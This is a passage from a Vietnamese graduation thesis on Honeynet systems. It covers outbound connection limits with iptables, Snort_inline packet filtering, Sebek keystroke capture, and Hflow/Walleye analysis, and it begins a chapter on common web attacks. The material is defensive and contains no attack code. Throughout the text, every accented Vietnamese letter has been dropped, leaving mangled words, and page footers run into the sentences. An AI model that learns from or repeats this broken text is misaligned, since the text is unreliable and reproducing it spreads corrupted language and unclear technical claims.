Kt qu phn tch

Hnh 2.5 - M hnh kin trc logic ca Honeynet Trong mt h thng Honeynet bao gm ba module chnh : Module iu khin d liu ( hay kim sot d liu): nhim v ca Module ny l kim sot d liu vo ra H thng Honeynet, kim sot hot ng ca k tn cng, ngn chn k tn cng s dng h thng mng Honeynet tn cng hay gy tn hi cho cc h thng bn ngoi khc. thc hin c nhim v ny, Honeynet s dng hai cng c chnh l Firewall Iptables v IDS-Snort. Module thu nhn d liu : nhim v ca Module ny l thu thp thng tin, gim st v ghi li cc hnh vi ca k tn cng bn trong H thng Honeynet. thc hin c nhim v ny, Honeynet s dng cng c Sebek client- server. Module phn tch d liu : nhim v ca Module ny l h tr phn tch d liu thu nhn c nhm a ra: k thut, cng c v mc ch tn cng ca hacker. T , gip
23 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip a ra cc bin php phng chng kp thi. V cc cng c Walley, Hflow trong Honeynet s thc hin c nhim v ny. Cn c vo m hnh kin trc logic ca Honeynet, ta c th tm tt qa trnh hot ng ca H thng Honeynet nh sau: u tin, lung d liu i vo s c kim sot bi chnh sch lut ca Firewall Iptables (Firewall Iptables gm c cc lut (Rule) nh ngha s cho php (Allow) hoc khng cho php (Deny) cc truy cp t bn ngoi i vo hoc bn trong h thng i ra, v kim sot cc lung d liu qua Honeywall) v chnh sch lut ca IDS-snort (hay cn gi l IDS sensor: gm c cc lut (Rule ) nh ngha cc du hiu tn cng). Tip theo, Module thu thp d liu s s dng cng c Sebek client server tin hnh thu thp thng tin. Thng tin thu thp c s c lu vo trong C s d liu (Data Store). Cui cng, nh s h tr ca cc cng c Walley, Hflow, Module phn tch s tin hnh thc hin phn tch ni dung cc thng tin thu thp c trong C s d liu. T a ra kt qu phn tch cho thy Honeynet c phi ang b tn cng hay khng? Nu b tn cng th kiu k thut tn cng (chng hn nh: Dos-Ddos, XSS, SQL-injection,.) ca k tn cng l g ? Cng c Hacker s dng l g?.... gip hiu k hn v hot ng ca H thng Honeynet, n s tip tc phn tch k hn v ba Module ny. 2.1. Module iu khin d liu (hay kim sot d liu) 2.1.1. Vai tr - nhim v ca Module iu khin Khi Honeynet khng c s kim sot d liu th H thng s phi i mt vi nhng nguy c ln nh : * K tn cng c th chim c quyn kim sot Honeynet v thc hin cc hnh vi ph hoi h thng. * Honeynet b k tn cng li dng bin thnh cng c tn cng vo cc h thng mng bn ngoi khc... T , t ra yu cu cn phi c c ch kim sot d liu, c th l: * Th nht l cho php k tn cng tn cng vo bn trong h thng nhng phi kim sot c cc hnh vi ca k tn cng.
24 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

Honeynet

n Tt Nghip * Th hai l ngn chn, loi b cc tn cng ca k tn cng ra bn ngoi. Nhim v ca module iu khin d liu l ngn chn k tn cng s dng h thng mng Honeynet tn cng hay gy tn hi cho cc h thng bn ngoi khc. Khi mt honeypot bn trong Honeynet b hacker kim sot, chng ta phi kim ch hot ng v m bo honeypot khng b s dng gy tn hi cho cc h thng khc. Kim sot d liu lm gim nh nguy c e da, n kim sot hot ng ca k tn cng bng vic gii hn cc lung thng tin vo/ra trong h thng mng Nguy c e da y, l mt khi k tn cng gy tn hi ti h thng bn trong Honeynet, chng c th s dng chnh h thng Honeynet ny tn cng cc h thng khc bn ngoi h thng Honeynet. V d mt h thng no trn Internet. K tn cng phi b kim sot n khng th thc hin iu . Yu cu t ra l Modul iu khin d liu phi hot ng tt sao cho k tn cng ch thc hin cc tn cng vo h thng Honeynet m khng gy tn hi ti cc h thng khc bn ngoi. - Di y l m hnh kim sot d liu:

Hnh 2.6 - M hnh kim sot d liu

25 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip Vi m hnh kim sot d liu ny th thng tin i vo Honeynet khng b hn ch nhng thng tin ra i ra th li b hn ch, b kim sot cht ch. 2.1.2. C ch kim sot d liu Vic kim sot d liu c thc hin ngay ti Gateway (Honeywall), v da trn hai c ch l: * Mt l gii hn s lng kt ni ra bn ngoi * Hai l lc gi tin c hi - Packet Scrubbed. hiu c c ch kim sot d liu, chng ta s i vo tm hiu tng c ch ny. a, Gii hn s lng kt ni ra bn ngoi C ch ny cho php bt k kt ni no i vo nhng li gii hn kim sot s lng kt ni ra bn ngoi v khi t ti gii hn th tt c cc kt ni ra bn ngoi v sau s b chn li. C ch ny c thc hin thng qua s dng Firewall IPtables, Firewall phi tnh s lng kt ni ra bn ngoi v khi t ti gii hn no h thng s chn cc kt ni vt qu. Nh vy, m gim thiu nguy c k tn cng s dng h thng Honeynet lm cng c thc hin tn cng vo cc h thng bn ngoi khc (Bi v thc hin cc hot ng ny i hi cn s dng nhiu kt ni t trong h thng Honeynet ra bn ngoi.). Vic gii hn c thit lp bi ngi qun tr, khng c mt quy tc gii hn c th no c nh cho Module iu khin d liu, ngi thit k h thng cn c vo yu cu v mc ch ca h thng a ra cc gii hn ph hp vi tnh hnh thc t. Nu tng s lng kt ni ra bn ngoi s cho php hot ng tn cng ca hacker din ra nhiu hn t chng ta thu c nhiu thng tin c gi tr hn song ng thi cng gy nhiu nguy him hn. Cn nu cho php t hoc khng cho kt ni ra bn ngoi, th s t nguy c hn song cch ny gy ra s nghi ng cho k tn cng v c th pht hin ra chng ang tng tc vi h thng Honeynet. Sau , chng c th thc hin cc hnh vi ph hoi nh: xa d liu hay a vo cc thng tin sai lch nhm ph v cc tnh ton vn, tnh sn sng ca thng tin. Tm li, s lng kt ni cho php ra bn ngoi ty thuc vo ci m chng ta c gng tm hiu v s lng nguy c m chng ta chp nhn i mt.Thng thng, h
26 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip thng Honeynet cho php t 10 n 20 kt ni ra bn ngoi trong 1 ngy. S lng ny i vi hacker l kh mm do ging nh m 1 kt ni ra bn ngoi ti cng c hay thc hin IRC truyn thng. Song li s lng chn hu ht cc tn cng ra bn ngoi nh tn cng t chi dch v hay d qut h thng. b) Lc gi tin c hi (Packet Scrubbed) C ch ny c nhim v pht hin ra nhng lung d liu gy nguy him cho h thng. C ch lc gi tin c hi thng c thc hin bi h thng ngn chn xm nhp mc mng NIPS (Network Intrustion Prevention Systems), c th y l h thng IDS-Snort. Mc ch ca NIPS l pht hin v ngn chn nhng tn cng bit c inh ngha trong tp cc lut (Rule) ca NIPS. NIPS thc hin cng vic ny bng phng php thanh tra mi gi tin khi n i qua gateway, n thc hin so snh ni dung gi tin vi c s d liu mu tn cng c sn (Cc Rule) nhm pht hin ra du hiu tn cng. Khi pht hin ra lung d liu tn cng, h thng s thc hin cc bin php ngn chn tn cng thch hp. Trn thc t, NIPS thc hin ngn chn bng vic thc hin hai bin php sau : * Th 1 l loi b gi tin : thc hin hy b gi tin cha ni dung c hi khng cho i ra bn ngoi (chn cuc tn cng). Bin php ny thc hin n gin song km linh hot d gy nghi ng cho hacker. * Th 2 l thay th, sa cha gi tin : thay v loi b gi tin th NIPS s thc hin thay th ni dung bn trong gi tin khin n v hi i vi h thng bn ngoi (v hiu ha cuc tn cng). NIPS s thay i mt vi byte bn trong on m khai thc, lm mt hiu lc chc nng ca n v cho php n tip tc i ra ngoi. Hacker s thy cuc tn cng c pht ng nh mun. Bin php ny cho php chng ta ginh c quyn kim sot hnh vi ca k tin tc tt hn ng thi n cng ht sc linh hot khin hacker kh pht hin hn. Tm li, C ch lc gi tin c hi c thc hin thng qua h thng ngn chn xm nhp mc mng NIPS (Network Intrustion Prevention Systems), c th y l h thng IDS-Snort.
27 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip 2.1.3. Kim sot d liu trong Honeynet II Honeynet c pht trin qua ba th h l th h I, II v III. V mt bn cht th c ba th h Honeynet ny u c cch thc kim sot d liu gn ging nhau. Tuy nhin, Honeynet II,III c nhng im ci tin nng cao hn sao vi Honeynet I. V vy, chng ta s phn tch v Kim sot d liu trong Honeynet II minh ha cho Module kim sot d liu ca Honeynet. T , gip chng ta thy c nhng ci tin nng cao ca Honeynet II so vi Honeynet I. a) Tng la IPTABLES Gii thiu: Chng trnh tng la IPtables l do Netfilter Organiztion vit ra nhm tng tnh nng bo mt trn h thng Linux. Iptables cung cp cc tnh nng sau:

Tch hp tt vi nhn (kernel) ca Linux. C kh nng phn tch gi tin (package) hiu qu. Lc gi tin da vo a ch MAC v mt s c hiu trong TCP Header Cung cp chi tit cc ty chn ghi nhn s kin h thng . Cung cp k thut NAT C kh nng ngn chn mt s c ch tn cng theo kiu DoS IPtables s kim tra tt c cc package khi n i qua iptables host, qu trnh kim

C ch x l package trong iptables : tra ny c thc hin mt cch tun t entry u tin n entry cui cng. C ba loi bng trong iptables: * Mangle table: chu trch nhim bin i quality of service bits trong TCP header. Thng thng loi table ny c ng dng trong SOHO (Small Office/Home Office). * Filter queue: chu trch nhim thit lp b lc packet (packet filtering), c ba loi built-in chains c m t thc hin cc chnh sch v firewall (firewall policy rules) : - Forward chain : Cho php packet ngun chuyn qua firewall. - Input chain : Cho php nhng gi tin i vo t firewall. - Output chain : Cho php nhng gi tin i ra t firewall. * NAT queue: thc thi chc nng NAT (Network Address Translation), cung cp
28 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip hai loi built-in chains sau y: - Pre-routing chain : NAT t ngoi vo trong ni b. Qu trnh NAT s thc hin trc khi khi thc thi c ch routing. iu ny thun li cho vic i a ch ch a ch tng thch vi bng nh tuyn ca firewall, khi cu hnh ta c th dng kha DNAT m t k thut ny. - Post-routing chain: NAT t trong ra ngoi. Qu trnh NAT s thc hin sau khi thc hin c ch nh tuyn. Qu trnh ny nhm thay i a ch ngun ca gi tin. K thut ny c gi l NAT one-to-one hoc many-to-one, c gi l Source NAT hay SNAT. c ci nhn tng qut i vi vic lc v x l gi trong iptables, chng ta xem hnh sau:

Hnh 2.7 Qu trnh lc v x l gi tin ca IPtables Trong H thng Honeynet th IPtables c vai tr ht sc quan trng trong vic kim sot d liu, thc hin gii hn s lng kt ni ra bn ngoi, ch cho Hacker tn cng vo Honeynet nhng li ngn chn Hacker bin Honeynet thnh cng c, bn p tn cng vo vng mng sn xut v cc h thng mng bn ngoi. Hnh 2.8 di y m t qu trnh kim sot d liu ca Honeynet:

29 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip

Hnh 2.8 - S kim sot d liu Qu trnh kim sot d liu ca IPTABLES: Sau khi Hacker tn cng c vo Honeynet, chim c quyn kim sot Honeypot th Hacker s c gng tip tc s dng Honeypot lm cng c thc tn cng cc H thng mng bn ngoi nh : tn cng t tri dc v, tn cng d qut h thng,. thc hin c cc tn cng ny th s phi cn phi m rt nhiu kt ni t Honeypot ra bn ngoi. Tuy nhin, do c tng la IPTABLES thc hin nhim v gii hn s lng kt ni ra bn ngoi nn Hacker khng th thc hin thnh cng cc tn cng ny. b) IDS Snort Gii thiu: Snort l mt trong cc sn phm an ninh mng pht hin xm nhp (Instruction Detection System IDS) c s dng ph bin nht hin nay. Snort cha mt tp lut nh ngha du hiu cc k thut tn cng c bit. Snort thc hin thanh tra ni dung cc gi tin v so snh ni dung cc gi tin ny c s d liu mu cc tn cng (cc Rule). Khi pht hin thy c du hiu b tn cng th Snort c th phn ng bng nhiu cch khc nhau ph thuc vo cu hnh m chng ta thit lp, chng hn nh n c th gi thng ip cnh bo n nh qun tr hay loi b gi tin khi pht hin c s bt thng trong cc gi tin .
30 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip Tuy nhin snort cng c im yu. l tng t nh cc b qut virus (virus scanner), snort ch c th chng li cc cuc tn cng mt cch hiu qu nu nh n bit c du hiu (signature) ca cc cuc tn cng . Da vo im ny, cc hacker "cao th" c th iu chnh cc cuc tn cng thay i signature ca cuc tn cng . T cc cuc tn cng ny c th "qua mt" c s gim st ca snort. Nh vy c th thy rng, snort hot ng mt cch hiu qu th mt trong nhng yu t quan trng cn phi ch l cc lut vit cho snort. Khi snort hot ng, n s c cc tp lut, gim st lung d liu chy qua h thng v s phn ng nu c bt k lung d liu no ph hp vi tp lut ca n. C th hn, tp lut c th c to ra gim st cc n lc quyt cng (scanning), tm du vt (footprinting), hoc nhiu phng php khc m cc hacker dng tm cch chim quyn h thng. Tp lut ny c th c to ra bi ngi dng hoc ngi dng c th truy cp n trang ch ca snort l: http://www.snort.org ly v. Vai tr, hot ng ca Snort trong Honeynet: Trong vic kim sot d liu ca Honeynet, Snort ng vai tr ht sc quan trng, thc hin nhim v lc gi tin c hi. Nhn vo hnh 2.3 s kim sot d liu ca Honeynet trn ta thy: Sau khi Hacker tn cng c vo Honeynet, chim c quyn kim sot Honeypot th Hacker s c gng tip tc s dng Honeypot lm cng c thc tn cng cc H thng mng bn ngoi nh : tn cng t tri dc v, tn cng d qut h thng,.Kt hp cng vi IPTABLES, Snort thc hin chn ng cc c gng tn cng ny ca Hacker bng cch lc cc gi tin c hi do Hacker to ra. Khi pht hin ra gi tin c hi th Snort s thay i ni dung gi tin thnh v hi hoc chn cc gi tin ny li. Trong h thng Honeynet, ngi ta nng cp chc nng ca Snort ln mt mc cao hn l Snort_inline. Snort_inline ci tin hn so vi Snort ch: n ch thanh tra ni dung cc gi tin sau khi i qua Iptables (Trong khi , Snort li lng nghe cc gi tin trn interface c ch nh v da vo cc lut c thit lp sn cho php xc nh c s xm nhp hay ph hoi...V n lng nghe tt c cc packet n nn vic x l kh chm). iu ny lm cho gim bt s lng cc gi tin cn x l v tng tc x l. Tng la IPtables cho cc gi tin i qua vo hng i (QUEUE) v Snort_inline m
31 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip tng gi tin kim tra v ty ra cc gi tin.V Hnh 2.4 di y s cho chng ta thy r qu trnh hot ng ny ca Snort_inline:

Hnh 2.9 - Qu trnh hot ng ny ca Snort_inline C ch loi b gi tin: Hnh 2.5 di y cho thy: trn ng i ca cc gi tin t Honeypot ra bn ngoi th phi i qua c s kim tra ca tng la IPTABLES; c th y, IPTABLES s dng cc lut ca mnh kim tra tnh hp l ca gi tin. Sau , IPTABLES a cc gi tin hp l vo hng i tip tc c Snort_inline kim tra mt ln na. Snort s thanh tra ni dung cc gi tin ny v so snh vi cc mu tn cng c lu trong c s d liu. Khi pht hin thy c du hiu tn cng th Snort s gi yu cu IPtables chn gi tin ny li khng cho ra bn ngoi. Bin php ny thc hin n gin song km linh hot d gy nghi ng cho hacker.

32 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip

Hnh 2.10 - C ch lm vic ca Snort_inline C ch thay th gi tin: c ch ny c bn cng ging nh c loi b gi tin, ch khc ch: khi pht hin ra tn cng, thay v gi yu cu ti IPtables chn v loi b gi tin th Snort_inline s thay th, sa cha ni dung bn trong gi tin khin n v hi i vi h thng bn ngoi. Snort_inline s thay i mt vi byte bn trong on m khai thc, lm mt hiu lc chc nng ca n v cho php n tip tc i ra ngoi. Hacker s thy cuc tn cng c pht ng nh mun. Bin php ny cho php chng ta ginh c quyn kim sot hnh vi ca k tin tc tt hn ng thi n cng ht sc linh hot khin hacker kh pht hin hn. Tm li: Module iu khin d liu c vai tr ht sc quan trng ca Honeynet, thc hin kim sot d liu i ra bn ngoi h thng, kim sot hot ng ca k tn cng, gip ngn chn k tn cng s dng h thng mng Honeynet tn cng hay gy tn hi cho cc h thng bn ngoi khc. 2.2. Module thu nhn d liu 2.2.1. Vai tr - nhim v ca Module thu nhn d liu Thu nhn d liu nhm khm ph ra k thut xm nhp, tn cng, cng c v mc ch ca hacker. ng thi pht hin ra cc l hng h thng. ng vai tr v cng quan trng trong Honeynet, khng c module thu nhn d liu th Honeynet s khng th thc hin mc ch trin khai xy dng ca mnh, khng c gi tr.
33 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip Module thu nhn d liu thc hin gim st v ghi li cc hnh vi ca k tn cng bn trong Honeyney. Nhng hnh vi c t chc thnh nhng d liu c s v l ct li ca vic nghin cu v phn tch. c nhiu d liu thu nhn v thu thp y thng tin, chi tit ca cc hnh vi ca k tn cng th cn phi c nhiu c ch thu nhn d liu khc nhau. Module ny s dng nhiu c ch khc nhau thu nhn nhiu loi d liu khc nhau. Vic thu nhn d liu c th c thc hin bng nhiu phng thc nh: * Thu nhn d liu t tng la * Thu nhn d liu t lun d liu mng * Thu nhn d liu t hot ng ca honeypot trong h thng m bo Honeynet hot ng tt th yu cu i vi modul thu nhn d liu * Thu nhn cng nhiu d liu cng tt * m bo tnh chnh xc, sn sng * Che du i vi hacker 2.2.2. C ch thu nhn d liu Nhm p ng cc yu cu ca vic thu nhn d liu, Module thu nhn d liu thc hin thu nhn d liu trong Honeynet da trn ba tng : + Thu nhn t tng la (s dng nht k ca tng la Firewall Log). + Thu nhn t lung mng (nh cng c Snort). + Thu nhn t hot ng Honeypot trong h thng (nh vo Sebek client server). Chng ta s thy r ba c ch ny qua s thu nhn d liu di y:

34 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip

Hnh 2.11 - S thu nhn d liu


a) Thu nhn d liu t Firewall

Firewall cho php thu nhn d liu rt tt bi v tt c lung d liu u phi qua n. Cc thng tin m Firewall ghi li bao gm : * a ch IP ngun ca gi tin (c th a ch IP ca my tnh Hacker). * a ch IP ch ca gi tin (thng l a ch ca cc Honeypot). * Giao thc truyn thng c s dng (thng l cc giao thc truyn thng ca cc dich v mng m Honeypot c xy dng Hacker tn cng). * Cng ngun ca gi tin * Cng ch ca gi tin ( thng l s cng ca cc giao thc mng m Honeynet m cho php Hacker tn cng). * Thi im din ra cuc tn cng (da trn tem thi gian ca gi tin). Di y l mt phn thng tin ca file nht k (log) trn firewall, ghi li y cc thng tin trn :

35 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip

Hnh 2.12 - Nht k s dng thu nhn d liu trn Honeynet b)Thu nhn d liu t lung d liu mng Thu nhn d liu t lung d liu mng thc hin thu nhn mi gi tin vi y ni dung payload ca gi tin i vo hay i ra h thng Honeynet. Trong Honeynet tng thu nhn d liu ny c thc hin bi Snort (tch hp vo trong Honeywall) c cu hnh ch thu nhn tt c cc gi tin trong mng (thc hin lng nghe trn Interface ca mng). Snort thc hin vic thu nhn gi tin trong mng thng qua cng c h tr Libpcap (trn Linux) hoc Winpcap (trn Window) bt cc gi tin. Vai tr quan trng nht ca Snort l thu nhn tt c lung d liu mng vo-ra h thng Honeynet. Snort c s dng bt v ghi nhn mi gi tin v payload ca gi tin trn ng truyn. Nh s thu nhn d liu hnh 2.7, ta thy : Snort thc hin lng nghe trn ton mng bt gi v thanh tra ni dung ca tt c cc gi tin qua n. c)Thu nhn d liu t hot ng trn cc Honeypot Nhim v ca modul thu nhn d liu l ghi li ton b cc hot ng ca hacker tng tc vi h thng Honeynet. Chng ta c th chia cc hot ng tng tc thu thp thng tin thnh 4 mc sau: * Hot ng mc mng * Hot ng mc h thng * Hot ng mc ng dng
36 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip * Hot ng mc ngi dng Hai tng thu nhn d liu c trnh by trn (thu nhn d liu t tng la v thu nhn d liu t lung mng) thc hin thu nhn c cc hot ng mc mng. Tng thu nhn d liu th 3 ny s thu nhn: cc hot ng mc h thng, hot ng mc ng dng v hot ng mc ngi dng. y chnh l tng thu nhn d liu ch yu trong Honeynet. thu nhn c d liu t cc Honeypot, Honeynet s cng c Sebek client server thc hin cng vic ny. Trong , Sebek server tch hp trong Honeywall, cn Sebek client l mt chng trnh hot ng nh mt rookit, c ci t trn Honeypot, c kh nng n cc tin trnh, file, v c d liu trong registry (vi Windows), ghi li cc thng s v kt ni mng; thc hin gim st tt c cc hot ng, cc kt ni mng ca Honeypot, v bo co gi cc thng tin thu thp c v Sebek server. Tm li: Sebek l cng c ghi li cc hot ng ca hacker trn cc Honeypot, ghi li cc keystroke ca hacker, hot ng theo m hnh client-server. M hnh hot ng ca Sebek: Di y l m hnh hot ng ca Sebek:

Hnh 2.13 - M hnh hot ng ca Sebek


37 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip Sebek hot ng theo m hnh clientserver. Theo m hnh ny, thnh phn Sebek client c ci t trn cc Honeypot, cn thnh phn Sebek server th c tch hp sn trn Honeywall. Khi k tn cng thc hnh vi xm nhp vo cc Honeypot th Sebek client s thu thp ton b cc thng tin v hot ng ca Hacker v gi v Sebek server Honeywall. V ti y, cc thng tin thu thp c s c em ra phn tch. Tip theo, chng ta s tip tc tm hiu chi tit v vai tr, hot ng ca tng thnh phn Sebek client v Sebek server. Sebek client : * Sebek client s dng k thut rootkit, tc l Sebek client hot ng nh mt rootkit, c kh nng n cc tin trnh, file, v c d liu trong registry (vi Windows), ghi li cc thng s v kt ni mng; thc hin gim st tt c cc hot ng, cc kt ni mng ca cc Honeypot. * Sebek client c ci t trn cc Honeypot v nm hon ton trong nhn ca h iu hnh. Gm c c phin bn cho window (Sebek-Win32-3.0.4.zip) v cho c Linux (sebek-linux-3.0.3). * Sebek client thc hin cc nhim v sau: - Thu nhn d liu: o Bt ton b d liu hot ng thng qua hm read() o Thay th hm read() trong System Call Table bng hm read() mi o Hm read() mi gi hm read c ng thi sao d liu vo b m gi tin o Thm header vo v gi ti Sebek Server Chng ta s thy r qu trnh thu nhn d liu ny ca Sebek client hnh di y:

38 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip

Hnh 2.14 - Sebek client thu nhn d liu - Truyn gi tin ti Sebek Server: Sau khi thu thp c d liu th Sebek client s gi cc d liu ny Sebek server trn Honeywall. gi d liu v Sebek server th Sebek client ng gi cc d liu thnh cc gi tin sebek. Cc gi tin sebek ny u c c im l chng u c chung mt a ch IP mng ch, a ch IP ny l tham s bt tay lin lc gia Sebek client v sebek server; ni cch khc : a ch IP ch trn tt c cc gi tin sebek chnh l tham s gip Honeywall nhn ra cc gi tin sebek bt gi cc gi tin sebek ny. a ch IP ny c khai bo khi ci t Honeywall v c khi ci t Sebek client trn Honeypot. Theo mc nh, honeywall t IP cho a ch l : 10.0.0.253. Tuy nhin, ta c th i bng mt a ch IP khc. thy r iu ny, chng ta c th xem phn cu hnh ci t Honeywall v ci t Sebek client chng IV. Sebek Server : * Sebek server c ci t v cu hnh trn Honeywall, thc hin nhim v nhn d liu thu thp c c gi t Sebek client v. * Sebek server s dng cc cng c: - Cng c sbk_extract thc hin trch rt d liu sebek t lung d liu mng. - Cng c sbk_ks_log.pl trch rt keystroke a ra u ra chun.
39 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip - Cng c sbk_upload.pl ti a liu sebek vo c s dc liu. Tm li : Module thu nhn d liu thc hin nhim v thu nhn d liu nhm khm ph ra cc k thut xm nhp, tn cng, cng c v mc ch ca hacker. ng thi pht hin ra cc l hng h thng. ng vai tr v cng quan trng trong Honeynet, khng c module thu nhn d liu th Honeynet s khng th thc hin mc ch trin khai xy dng ca mnh, khng c gi tr. 2.3. Modul phn tch d liu 2.3.1. Vai tr Vai tr ca module phn tch d liu trong Honeynet nhm h tr ngi phn thch thc hin vic sng lc, thu gn d liu nhm loi b nhng d liu d tha, d dng tm ra mi tng quan gia cc d liu nhm pht hin ra vn trng tm cn phn tch (nh d liu lin quan n qu trnh tn cng, xm nhp hay hot ng bt hp php ca hacker). H tr phn tch d liu thu nhn c nhm a ra: k thut, cng c v mc ch tn cng ca hacker. T gip ngi qun tr a ra cc bin php phng chng kp thi. i vi h thng Honeynet, nu k tn cng s dng K thut tn cng mi hay cng c tn cng mi th Honeynet lu gi li ton b cc d liu v qu trnh thc hin tn cng ny ca Hacker. Do , ngi qun tr c th s dng cc d liu ny phn tch v a ra c ch, mc ch, cng c, phng php ca cuc tn cng thm ch c th xy dng cc mu tn cng mi cp nht cho h thng IDS gip cho IDS pht hin ra tn cng mi ny nu tip tc gp li ln sau. Honeyney cung cp cho chng ta mt s cng c nh Hflow, Walleye h tr ngi qun tr d dng phn tch, tm ra c ch, mc ch, cng c v phng php tn cng ca hacker. 2.3.2. C ch phn tch d liu Honeynet h tr hai cng c sau thc hin qu trnh phn tch d liu : * Mt l Hflow: c kh nng t ng kt hp d liu

40 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip * Hai l Walleye: c kh nng bo co, thng k thng qua giao din web thn thin vi ngi dng. C hai cng c ny u c tch hp sn trn Honeywall. Di y l S kin trc Honeywall :

Hnh 2.15 - S kin trc Honeywall Theo s kin trc ny th qu trnh Hflow v Walleye thc hin phn tch d liu nh sau : Hflow: Hflow c nhim v kt hp d liu t module thu nhn d liu gi v, chun ha d liu sau lu vo c s d liu ( y l My SQL). Hflow t ng xc nh : - H iu hnh khi to kt ni mng. - S kin IDS lin quan n kt ni mng. - S kin IDS lin quan n tin trnh v ngi dng trn Honetpot. - Danh sch cc tp lin quan n cuc tn cng.

41 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip Walleye : Walleye c nhim v ly d liu thu thp c c Hflow chun ha trong C s d liu cung cp cho ngi phn tch thng qua giao din web.Nh vy, m ngi phn tch c th nm c khung cnh chung cc hot ng h thng, nm c chi tit cc hot ng trong mng. Di y l giao din ca Walleye:

Hnh 2.16 - Giao din ca Walleye Tm li : Module ny c nhim v h tr ngi phn thch thc hin vic sng lc, thu gn d liu nhm loi b nhng d liu d tha, h tr phn tch d liu thu nhn c nhm a ra: k thut, cng c v mc ch tn cng ca hacker. T gip ngi qun tr a ra cc bin php phng chng kp thi. Kt lun: chng ny, Chuyn trnh by v m hnh kin trc v nguyn l hot ng ca H thng Honeynet. Qua , gip chng ta hiu su hn v qu trnh lm vic, hot ng ca Honeynet.

42 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip Chng III MT S K THUT TN CNG DCH V WEB Ngy nay, khi Internet c ph bin rng ri, cc t chc, c nhn u c nhu cu gii thiu thng tin ca mnh trn xa l thng tin cng nh thc hin cc phin giao dch trc tuyn. Vn ny sinh l khi phm vi ng dng ca cc ng dng Web ngy cng m rng th kh nng xut hin li v b tn cng cng cao, tr thnh i tng cho nhiu ngi tn cng vi cc mc ch khc nhau. i khi, cng ch n gin l th ti hoc a bn vi ngi khc. Cng vi s pht trin khng ngng ca Internet v cc dch v trn Internet, s lng cc v tn cng trn Internet cng tng theo cp s nhn. Trong khi cc phng tin thng tin i chng ngy cng nhc nhiu n nhng kh nng truy nhp thng tin ca Internet, th cc ti liu chuyn mn bt u cp nhiu n vn bo m v an ton d liu cho cc my tnh c kt ni vo mng Internet. C 64,2 triu lt my tnh ti Vit Nam b nhim virus l tng kt nm 2011 t H thng gim st virus ca Bkav. Trung bnh mt ngy c hn 175 nghn my tnh b nhim virus. Nm 2011, c 38.961 dng virus xut hin mi, ly lan nhiu nht l virus W32.Sality.PE. Virus ny ly nhim trn 4,2 triu lt my tnh. Ngay Vit Nam ta, theo bn tng kt tnh hnh an ninh mng ti Vit Nam trong nm 2007 ca Trung tm An ninh mng BKIS cho thy : Vit Nam c 342 Website b tn cng, trong c 118 Website do Hacker trong nc v 224 website l do Hacker nc ngoi thc hin. V gn y nht l v tn cng website v ot tn min ca Cng ty chuyn cung cp hosting Pavietnam, khin cho khng ch ring Website ca cng ty ny m cn nh hng ti hng nghn website ca cc cng ty khc thu hosting PAvietnam. Nm 2011 l nm ca cc cuc tn cng mng. Lin tip xy ra cc cuc tn cng vi cc hnh thc khc nhau vo h thng ca cc t chc, doanh nghip ti Vit Nam. C nhng cuc tn cng xm nhp tri php ph hoi c s d liu hoc deface cc website. Cng c nhng cuc tn cng DDoS lm t lit h thng trong thi gian di. Tn cng cp tn min ca cc doanh nghip cng din ra lin tip. Nguy him hn, xut hin nhiu cuc tn cng m thm, ci t cc virus gin ip nh cp ti liu ca cc c quan quan trng.
43 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip Cc v tn cng xy ra phn ln c nguyn nhn t nhn thc ca lnh o cc c quan, doanh nghip v tm quan trng ca an ninh mng, dn n s u t dn tri, thiu mt gii php tng th cho an ton an ninh h thng. ng ch trong nm 2011 l s vic hn 85.000 my tnh ti Vit Nam b ci virus Ramnit ly cp d liu quan trng. iu ny cho thy cc cuc tn cng cn c th gy nh hng n an ninh quc gia. Khng ch ti Vit Nam, h thng botnet ny cn c hacker iu khin thng qua nhiu my ch t M, Nga, c v Trung Quc ly cp thng tin trn ton cu. y l tnh trng ph bin trn th gii trong nm 2011. Theo nh t chc Web Hacking Incident Database a ra s liu cho nm 2011(WHID) cho thy tn ti rt nhiu phng php tn cng khc nhau, Nhng SQL Injection v XSS l ph bin nht. C n 18,87% l cc cuc tn cng nhm vo l hng SQL Injection, 12,58% l XSS. Ngoi ra cn c 8.06% l tn cng t chi dch v v rt nhiu cc cuc tn cng khc.

Hnh 2 17 Cch phng thc tn cng nm 2011 Trong phm vi ca n Nghin cu H thng Honeypot, Honeynet nhm mc ch thu thp cc k thut tn cng dch v Web, chng ny s trnh by mt s k thut tn cng dch v web ph bin hin nay chng ta c th d dng hiu, nhn ra
44 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

